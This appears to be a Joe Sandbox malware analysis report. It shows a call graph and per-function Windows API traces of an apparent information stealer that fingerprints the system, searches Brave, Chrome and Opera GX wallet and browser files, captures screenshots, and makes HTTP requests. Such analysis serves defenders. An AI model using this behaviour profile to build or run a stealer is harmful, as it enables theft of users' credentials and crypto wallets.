lstrcpy 82360->82361 82362 414eaa 82361->82362 82363 40fae3 4 API calls 82362->82363 82364 414eca 82363->82364 82365 40fa28 lstrcpy 82364->82365 82366 414ed7 82365->82366 82904 40fc7f GetProcessHeap HeapAlloc GetLocalTime wsprintfA 82366->82904 82368 414ee8 82369 40fae3 4 API calls 82368->82369 82370 414ef5 82369->82370 82371 40fa28 lstrcpy 82370->82371 82372 414f02 82371->82372 82373 40fae3 4 API calls 82372->82373 82374 414f22 82373->82374 82375 40fa28 lstrcpy 82374->82375 82376 414f2f 82375->82376 82377 40fae3 4 API calls 82376->82377 82378 414f52 82377->82378 82379 40fa28 lstrcpy 82378->82379 82380 414f5f 82379->82380 82905 40fcd9 GetProcessHeap HeapAlloc GetTimeZoneInformation 82380->82905 82383 40fae3 4 API calls 82384 414f83 82383->82384 82385 40fa28 lstrcpy 82384->82385 82386 414f90 82385->82386 82387 40fae3 4 API calls 82386->82387 82388 414fb3 82387->82388 82389 40fa28 lstrcpy 82388->82389 82390 414fc0 82389->82390 82391 40fae3 4 API calls 82390->82391 82392 414fe3 82391->82392 82393 40fa28 lstrcpy 82392->82393 82394 414ff0 82393->82394 82395 40fae3 4 API calls 82394->82395 82396 415013 82395->82396 82397 40fa28 lstrcpy 82396->82397 82398 415020 82397->82398 82908 40fe5f GetProcessHeap HeapAlloc RegOpenKeyExA 82398->82908 82401 40fae3 4 API calls 82402 415044 82401->82402 82403 40fa28 lstrcpy 82402->82403 82404 415051 82403->82404 82405 40fae3 4 API calls 82404->82405 82406 415074 82405->82406 82407 40fa28 lstrcpy 82406->82407 82408 415081 82407->82408 82409 40fae3 4 API calls 82408->82409 82410 4150a1 82409->82410 82411 40fa28 lstrcpy 82410->82411 82412 4150ae 82411->82412 82911 40fefb 82412->82911 82415 40fae3 4 API calls 82416 4150cc 82415->82416 82417 40fa28 lstrcpy 82416->82417 82418 4150d9 82417->82418 82419 40fae3 4 API calls 82418->82419 82420 4150f9 82419->82420 82421 40fa28 lstrcpy 82420->82421 82422 415106 82421->82422 82423 40fae3 4 API calls 82422->82423 82424 415126 82423->82424 82425 40fa28 lstrcpy 82424->82425 82426 415133 82425->82426 
82926 40fec8 GetSystemInfo wsprintfA 82426->82926 82428 415144 82429 40fae3 4 API calls 82428->82429 82430 415151 82429->82430 82431 40fa28 lstrcpy 82430->82431 82432 41515e 82431->82432 82433 40fae3 4 API calls 82432->82433 82434 41517e 82433->82434 82435 40fa28 lstrcpy 82434->82435 82436 41518b 82435->82436 82437 40fae3 4 API calls 82436->82437 82438 4151ab 82437->82438 82439 40fa28 lstrcpy 82438->82439 82440 4151b8 82439->82440 82927 40ffc9 GetProcessHeap HeapAlloc 82440->82927 82442 4151c9 82443 40fae3 4 API calls 82442->82443 82444 4151d6 82443->82444 82445 40fa28 lstrcpy 82444->82445 82446 4151e3 82445->82446 82447 40fae3 4 API calls 82446->82447 82448 415203 82447->82448 82449 40fa28 lstrcpy 82448->82449 82450 415210 82449->82450 82451 40fae3 4 API calls 82450->82451 82452 415230 82451->82452 82453 40fa28 lstrcpy 82452->82453 82454 41523d 82453->82454 82932 410032 _EH_prolog 82454->82932 82457 40fa6f 3 API calls 82458 415267 82457->82458 82459 40fa28 lstrcpy 82458->82459 82460 415274 82459->82460 82461 40fae3 4 API calls 82460->82461 82462 4152a3 82461->82462 82463 40fa28 lstrcpy 82462->82463 82464 4152b0 82463->82464 82465 40fae3 4 API calls 82464->82465 82466 4152d3 82465->82466 82467 40fa28 lstrcpy 82466->82467 82468 4152e0 82467->82468 82938 41030b _EH_prolog 82468->82938 82470 4152fb 82471 40fa6f 3 API calls 82470->82471 82472 415310 82471->82472 82473 40fa28 lstrcpy 82472->82473 82474 41531d 82473->82474 82475 40fae3 4 API calls 82474->82475 82476 41534f 82475->82476 82477 40fa28 lstrcpy 82476->82477 82478 41535c 82477->82478 82479 40fae3 4 API calls 82478->82479 82480 41537f 82479->82480 82481 40fa28 lstrcpy 82480->82481 82482 41538c 82481->82482 82946 4100b9 _EH_prolog 82482->82946 82484 4153ac 82485 40fa6f 3 API calls 82484->82485 82486 4153c2 82485->82486 82487 40fa28 lstrcpy 82486->82487 82488 4153cf 82487->82488 82489 4100b9 15 API calls 82488->82489 82490 4153fe 82489->82490 82491 40fa6f 3 API calls 82490->82491 82492 415414 82491->82492 82493 
40fa28 lstrcpy 82492->82493 82494 415421 82493->82494 82495 40fae3 4 API calls 82494->82495 82496 415453 82495->82496 82497 40fa28 lstrcpy 82496->82497 82498 415460 82497->82498 82499 415477 lstrlenA 82498->82499 82500 415487 82499->82500 82501 40f96a lstrcpy 82500->82501 82502 41549d 82501->82502 82503 4010b1 2 API calls 82502->82503 82504 4154b5 82503->82504 82962 414519 _EH_prolog 82504->82962 82506 4154c5 82507 401061 _EH_prolog 82506->82507 82508 4154ee 82507->82508 82508->80927 82510 40f9a1 lstrcpy 82509->82510 82511 404206 82510->82511 82512 403a7d 6 API calls 82511->82512 82513 404212 GetProcessHeap RtlAllocateHeap 82512->82513 83234 40fb94 82513->83234 82515 40424c InternetOpenA StrCmpCA 82516 40426b 82515->82516 82517 4043a1 InternetCloseHandle 82516->82517 82518 404276 InternetConnectA 82516->82518 82525 404312 82517->82525 82519 404296 HttpOpenRequestA 82518->82519 82520 404398 InternetCloseHandle 82518->82520 82521 404391 InternetCloseHandle 82519->82521 82522 4042cb 82519->82522 82520->82517 82521->82520 82523 4042e5 HttpSendRequestA HttpQueryInfoA 82522->82523 82524 4042cf InternetSetOptionA 82522->82524 82523->82525 82527 404335 82523->82527 82524->82523 82525->80932 82526 40434f InternetReadFile 82526->82521 82526->82527 82527->82521 82527->82525 82527->82526 83235 40612e 82528->83235 82530 40efa2 82531 4010b1 2 API calls 82530->82531 82532 40efb3 82531->82532 83474 40e7ff 9 API calls 82532->83474 82534 40ed97 StrCmpCA 82541 40ed6f 82534->82541 82536 4010b1 2 API calls 82538 40efc6 82536->82538 82537 40ee0b StrCmpCA 82537->82541 83517 40bc3c _EH_prolog 82538->83517 82539 40f9a1 lstrcpy 82539->82541 82541->82530 82541->82534 82541->82537 82541->82539 82542 40f96a lstrcpy 82541->82542 82543 40ef27 StrCmpCA 82541->82543 82548 4010b1 _EH_prolog lstrcpy 82541->82548 82550 40fa6f 3 API calls 82541->82550 82551 40fae3 _EH_prolog lstrlenA lstrcpy lstrcat 82541->82551 82554 40fa28 lstrcpy 82541->82554 83238 40d44e _EH_prolog 82541->83238 83292 40d708 
_EH_prolog 82541->83292 83404 40b902 _EH_prolog 82541->83404 82542->82541 82543->82541 82548->82541 82550->82541 82551->82541 82554->82541 82786 40f96a lstrcpy 82785->82786 82787 402150 82786->82787 82787->81702 82789 401081 82788->82789 82789->81755 82790->81702 82791->81702 82792->81702 82793->81702 82794->81748 82795->81759 82796->81749 82797->81732 82798->81716 82799->81717 82800->81716 82801->81696 82802->81716 82804 40f96a lstrcpy 82803->82804 82805 40216a 82804->82805 82805->81687 82806->81697 82807->81749 82809 410508 82808->82809 82810 40f96a lstrcpy 82809->82810 82811 410518 82810->82811 82811->81791 82812->81795 82814 403a96 82813->82814 82814->82814 82815 403a9d ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 82814->82815 82824 40fb94 82815->82824 82817 403adf lstrlenA 82825 40fb94 82817->82825 82819 403aef InternetCrackUrlA 82820 403b0d 82819->82820 82820->81804 82821->81929 82823 40f9dc 82822->82823 82823->81853 82824->82817 82825->82819 82826->81938 82827->82119 82828->82121 82829->82123 82830->82125 82831->82129 82832->82131 82834 40594c 82833->82834 82835 4062bf LocalAlloc 82833->82835 82834->81982 82834->81983 82835->82834 82836 4062cf CryptStringToBinaryA 82835->82836 82836->82834 82837 4062e6 LocalFree 82836->82837 82837->82834 82838->82139 82839->82147 82840->82158 82842 40f96a lstrcpy 82841->82842 82843 402102 82842->82843 82843->82174 82844->82191 82846 4104c4 CharToOemA 82845->82846 82847 4104a9 RegQueryValueExA 82845->82847 82846->82205 82847->82846 82850 411027 82849->82850 82851 41100b K32GetModuleFileNameExA CloseHandle 82849->82851 82852 40f96a lstrcpy 82850->82852 82851->82850 82853 411036 82852->82853 82853->82249 82981 40fc04 82854->82981 82857 4106c6 RegOpenKeyExA 82858 4106e6 RegQueryValueExA 82857->82858 82859 4106bf 82857->82859 82858->82859 82859->82271 82861 410807 82860->82861 82862 41080f CoSetProxyBlanket 82861->82862 82865 41090b 82861->82865 82864 41083f 82862->82864 82863 40f96a lstrcpy 82866 41091f 82863->82866 82864->82865 82867 
410847 82864->82867 82865->82863 82866->82285 82867->82866 82868 410873 VariantInit 82867->82868 82869 410895 82868->82869 82987 41070c CoCreateInstance 82869->82987 82871 4108a3 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 82872 40f96a lstrcpy 82871->82872 82873 4108ff VariantClear 82872->82873 82873->82866 82875 410990 82874->82875 82876 410a30 82875->82876 82877 410998 CoSetProxyBlanket 82875->82877 82878 40f96a lstrcpy 82876->82878 82879 4109c8 82877->82879 82881 410a44 82878->82881 82879->82876 82880 4109cc 82879->82880 82880->82881 82882 4109f0 VariantInit 82880->82882 82881->82299 82883 410a12 82882->82883 82993 410c73 LocalAlloc CharToOemW 82883->82993 82885 410a1a 82886 40f96a lstrcpy 82885->82886 82887 410a24 VariantClear 82886->82887 82887->82881 82889 40fc7a 82888->82889 82889->82313 82890->82326 82892 40f96a lstrcpy 82891->82892 82893 410455 82892->82893 82893->82341 82895 40f96a lstrcpy 82894->82895 82896 40fd54 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 82895->82896 82897 40fe3f 82896->82897 82903 40fd8f 82896->82903 82898 40fe50 82897->82898 82899 40fe47 LocalFree 82897->82899 82898->82355 82899->82898 82900 40fd94 GetLocaleInfoA 82900->82903 82901 40fae3 _EH_prolog lstrlenA lstrcpy lstrcat 82901->82903 82902 40fa28 lstrcpy 82902->82903 82903->82897 82903->82900 82903->82901 82903->82902 82904->82368 82906 40fd27 82905->82906 82907 40fd0b wsprintfA 82905->82907 82906->82383 82907->82906 82909 40fea2 RegQueryValueExA 82908->82909 82910 40feba 82908->82910 82909->82910 82910->82401 82912 40ff4d GetLogicalProcessorInformationEx 82911->82912 82913 40ff23 GetLastError 82912->82913 82914 40ff58 82912->82914 82915 40ffac 82913->82915 82916 40ff2e 82913->82916 82996 410ac4 GetProcessHeap HeapFree 82914->82996 82918 40ffb6 82915->82918 82997 410ac4 GetProcessHeap HeapFree 82915->82997 82924 40ff32 82916->82924 82918->82415 82919 40ff7f 82919->82918 82923 40ff85 wsprintfA 82919->82923 82923->82918 82924->82912 82925 40ffa5 82924->82925 

APIs
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418073
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041808A
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004180A1
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004180B8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004180CF
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004180E5
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004180FB
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000), ref: 00418116
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041812D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418144
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041815B
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75D90000), ref: 00418176
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CD30000), ref: 00418191
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004181A8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004181BF
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004181D6
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CB40000,SymMatchString), ref: 004181F0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                  • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                                                  • API String ID: 2238633743-951535364

Control-flow Graph (function at 0040C6CD)
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040C6D2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00425BD3,00425BD2,00000000,?,00425D1C,?,?,00425BCF,?,?,00000000), ref: 0040C773
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425D20,?,?,00000000), ref: 0040C7DA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425D24,?,?,00000000), ref: 0040C7F4
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425D28,?,?,00425BD6,?,?,00000000), ref: 0040C8A5
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                  • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                                                                  • API String ID: 3869166975-1816240570

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004154FF
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415525
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0041553C
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00415553
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00415561
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042684C), ref: 0041557F
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426850), ref: 00415599
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004155BD
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042655E), ref: 004155CE
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004155F4
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415608
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041561A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041562C
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00415665
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041567A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041568F
                                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004156B2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004157B4
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004157E5
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415908
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00415919
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                  • API String ID: 264515753-332874205
                                                                                                                                                                                                                                                                  • Opcode ID: 7985fb511fa2e463f3adddbab3e8f11cc3b70e35e4588eae0086117d87b8b892
                                                                                                                                                                                                                                                                  • Instruction ID: fb7acb2c5140ba4d505ebf3fd03b2dde52ac825db6e456b4197f015c4d1fc73c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7985fb511fa2e463f3adddbab3e8f11cc3b70e35e4588eae0086117d87b8b892
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AC170B190025DEEDF21EBA5DC45EEE777DAF05304F10406AF509A2192EB389A888B65

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004163B8
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004163D8
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004163EF
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426908), ref: 0041640C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042690C), ref: 00416426
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041644A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042656D), ref: 0041645B
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00416478
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041648C
                                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0041649F
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004164CB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426924), ref: 004164DD
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004164ED
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426928), ref: 004164FF
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416513
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 004166AE
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004166BD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                  • API String ID: 3254224521-445461498
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004112E8
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041130E
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00411344
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00411351
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00411358
                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00411362
                                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00411373
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041137E
                                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041139A
                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(?), ref: 004113F8
                                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(?), ref: 00411404
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: _EH_prolog.MSVCRT ref: 004043DB
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: lstrlenA.KERNEL32(00000000), ref: 0040444A
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044CD
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044ED
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041147E
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00411499
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004114A0
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 004114AA
                                                                                                                                                                                                                                                                  • CloseWindow.USER32(00000000), ref: 004114B1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                                                                                                                                                                                                  • String ID: image/jpeg
                                                                                                                                                                                                                                                                  • API String ID: 3067874393-3785015651
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004041E0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404227
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040422E
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040424D
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404261
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404285
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004042BB
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042DF
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042EA
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404308
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404360
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404392
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040439B
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004043A4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
